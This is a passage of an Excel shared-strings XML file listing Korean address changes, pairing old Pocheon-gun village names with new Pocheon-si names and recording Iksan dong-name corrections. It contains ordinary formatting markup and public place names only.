      </rPr>
      <t xml:space="preserve"> 군내면 용정리</t>
    </r>
  </si>
  <si>
    <t>포천군 군내면 유교리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 군내면 유교리</t>
    </r>
  </si>
  <si>
    <t>포천군 군내면 좌의리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 군내면 좌의리</t>
    </r>
  </si>
  <si>
    <t>포천군 군내면 직두리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 군내면 직두리</t>
    </r>
  </si>
  <si>
    <t>포천군 군내면 하성북리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 군내면 하성북리</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">포천군 군내면 </t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 군내면 </t>
    </r>
  </si>
  <si>
    <t>포천군 내촌면을</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 내촌면으로</t>
    </r>
  </si>
  <si>
    <t>포천군 내촌면 내리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 내촌면 내리</t>
    </r>
  </si>
  <si>
    <t>포천군 내촌면 마명리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 내촌면 마명리</t>
    </r>
  </si>
  <si>
    <t>포천군 내촌면 소학리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 내촌면 소학리</t>
    </r>
  </si>
  <si>
    <t>포천군 내촌면 신팔리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 내촌면 신팔리</t>
    </r>
  </si>
  <si>
    <t>포천군 내촌면 음현리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 내촌면 음현리</t>
    </r>
  </si>
  <si>
    <t>포천군 내촌면 진목리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 내촌면 진목리</t>
    </r>
  </si>
  <si>
    <t>포천군 내촌면</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>내촌면</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면을</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>신북면으로</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 경복대학교</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신북면 경복대학교</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 신포천아파트</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신북면 신포천아파트</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 가채리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>신북면 가채리</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 갈월리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신북면 갈월리</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 계류리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신북면 계류리</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 고일리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신북면 고일리</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 금동리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신북면 금동리</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 기지리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신북면 기지리</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 덕둔리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신북면 덕둔리</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 만세교리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>신북면 만세교리</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 삼정리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신북면 삼정리</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 삼성당리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신북면 삼성당리</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 신평리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신북면 신평리</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면 심곡리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신북면 심곡리</t>
    </r>
  </si>
  <si>
    <t>포천군 신북면</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 신북면</t>
    </r>
  </si>
  <si>
    <t>포천군 영북면을</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영북면으로</t>
    </r>
  </si>
  <si>
    <t>포천군 영북면 대회산리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영북면 대회산리</t>
    </r>
  </si>
  <si>
    <t>포천군 영북면 문암리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영북면 문암리</t>
    </r>
  </si>
  <si>
    <t>포천군 영북면 산정리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영북면 산정리</t>
    </r>
  </si>
  <si>
    <t>포천군 영북면 소회산리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영북면 소회산리</t>
    </r>
  </si>
  <si>
    <t>포천군 영북면 야미리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영북면 야미리</t>
    </r>
  </si>
  <si>
    <t>포천군 영북면 운천1∼2리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영북면 운천1∼2리</t>
    </r>
  </si>
  <si>
    <t>포천군 영북면 운천3∼6리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영북면 운천3∼6리</t>
    </r>
  </si>
  <si>
    <t>포천군 영북면 운천7∼9리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영북면 운천7∼9리</t>
    </r>
  </si>
  <si>
    <t>포천군 영북면 자일리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영북면 자일리</t>
    </r>
  </si>
  <si>
    <t>포천군 영북면</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영북면</t>
    </r>
  </si>
  <si>
    <t>포천군 영중면을</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영중면으로</t>
    </r>
  </si>
  <si>
    <t>포천군 영중면 거사리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영중면 거사리</t>
    </r>
  </si>
  <si>
    <t>포천군 영중면 금주리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영중면 금주리</t>
    </r>
  </si>
  <si>
    <t>포천군 영중면 성동리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영중면 성동리</t>
    </r>
  </si>
  <si>
    <t>포천군 영중면 양문리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>영중면 양문리</t>
    </r>
  </si>
  <si>
    <t>포천군 영중면 영송리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>영중면 영송리</t>
    </r>
  </si>
  <si>
    <t>포천군 영중면 영평리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영중면 영평리</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">포천군 영중면 </t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 영중면 </t>
    </r>
  </si>
  <si>
    <t>포천군 이동면을</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 이동면으로</t>
    </r>
  </si>
  <si>
    <t>포천군 이동면 노곡리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 이동면 노곡리</t>
    </r>
  </si>
  <si>
    <t>포천군 이동면 도평리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 이동면 도평리</t>
    </r>
  </si>
  <si>
    <t>포천군 이동면 연곡리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 이동면 연곡리</t>
    </r>
  </si>
  <si>
    <t>포천군 이동면 장암리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 이동면 장암리</t>
    </r>
  </si>
  <si>
    <t>포천군 이동면</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 이동면</t>
    </r>
  </si>
  <si>
    <t>포천군 일동면을</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 일동면으로</t>
    </r>
  </si>
  <si>
    <t>포천군 일동면 기산 1∼4리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 일동면 기산 1∼4리</t>
    </r>
  </si>
  <si>
    <t>포천군 일동면 기산 5∼8리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 일동면 기산 5∼8리</t>
    </r>
  </si>
  <si>
    <t>포천군 일동면 길명리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 일동면 길명리</t>
    </r>
  </si>
  <si>
    <t>포천군 일동면 사직리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 일동면 사직리</t>
    </r>
  </si>
  <si>
    <t>포천군 일동면 수입리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 일동면 수입리</t>
    </r>
  </si>
  <si>
    <t>포천군 일동면 유동리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 일동면 유동리</t>
    </r>
  </si>
  <si>
    <t>포천군 일동면 화대리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 일동면 화대리</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">포천군 일동면 </t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 일동면 </t>
    </r>
  </si>
  <si>
    <t>포천군 창수면을</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 창수면</t>
    </r>
  </si>
  <si>
    <t>포천군 창수면 가양리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 창수면 가양리</t>
    </r>
  </si>
  <si>
    <t>포천군 창수면 고소성리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 창수면 고소성리</t>
    </r>
  </si>
  <si>
    <t>포천군 창수면 신흥리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 창수면 신흥리</t>
    </r>
  </si>
  <si>
    <t>포천군 창수면 오가리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 창수면 오가리</t>
    </r>
  </si>
  <si>
    <t>포천군 창수면 운산리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 창수면 운산리</t>
    </r>
  </si>
  <si>
    <t>포천군 창수면 주원1∼2리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 창수면 주원1∼2리</t>
    </r>
  </si>
  <si>
    <t>포천군 창수면 주원3∼5리</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 창수면 주원3∼5리</t>
    </r>
  </si>
  <si>
    <t>포천군 창수면 추동리</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">포천시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t>창수면 추동리</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">포천군 창수면 </t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 창수면 </t>
    </r>
  </si>
  <si>
    <t>포천군 화현면을</t>
  </si>
  <si>
    <r>
      <t>포천시</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 화현면</t>
    </r>
  </si>
  <si>
    <t>전북</t>
  </si>
  <si>
    <t>익산시 모현1가동 모현아파트</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동1가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 모현아파트</t>
    </r>
  </si>
  <si>
    <t>동명정정</t>
  </si>
  <si>
    <t xml:space="preserve">익산시 모현1가동 모현우림아파트 </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동1가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 모현우림아파트 </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">익산시 모현1가동 모현현대1차아파트 </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동1가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 모현현대1차아파트 </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">익산시 모현1가동 모현현대2차아파트 </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동1가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 모현현대2차아파트 </t>
    </r>
  </si>
  <si>
    <t>익산시 모현1가동 1~119번지</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동1가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 1~119번지</t>
    </r>
  </si>
  <si>
    <t>익산시 모현1가동 120~250</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동1가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 120~250</t>
    </r>
  </si>
  <si>
    <t>익산시 모현1가동 251~380</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동1가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 251~380</t>
    </r>
  </si>
  <si>
    <t>익산시 모현1가동 381~529</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동1가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 381~529</t>
    </r>
  </si>
  <si>
    <t>익산시 모현1가동 530~800</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동1가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 530~800</t>
    </r>
  </si>
  <si>
    <t>익산시 모현1가동</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동1가</t>
    </r>
  </si>
  <si>
    <t>익산시 모현2가동 5~339번지</t>
  </si>
  <si>
    <t>익산시 모현2가동 340~526</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동2가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 340~526</t>
    </r>
  </si>
  <si>
    <t>익산시 모현2가동</t>
  </si>
  <si>
    <t>익산시 모현동 익산경찰서</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>모현동2가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 익산경찰서</t>
    </r>
  </si>
  <si>
    <t>소재지정정</t>
  </si>
  <si>
    <t>익산시 중앙1가동</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>중앙동1가</t>
    </r>
  </si>
  <si>
    <t>동명정정</t>
  </si>
  <si>
    <t>익산시 중앙3가동 1~60번지</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>중앙동3가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 1~60번지</t>
    </r>
  </si>
  <si>
    <t>익산시 중앙3가동 61~200</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>중앙동3가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 61~200번지</t>
    </r>
  </si>
  <si>
    <t>익산시 창인1가동 5~13번지</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>창인동1가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 5~13번지</t>
    </r>
  </si>
  <si>
    <t>익산시 창인1가동 14~234</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>창인동1가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> 14~234</t>
    </r>
  </si>
  <si>
    <t>익산시 창인1가동 235~300</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">익산시 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="10"/>
        <rFont val="굴림"/>
        <family val="3"/>
      </rPr>
      <t>창인동1가</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="굴림"/>
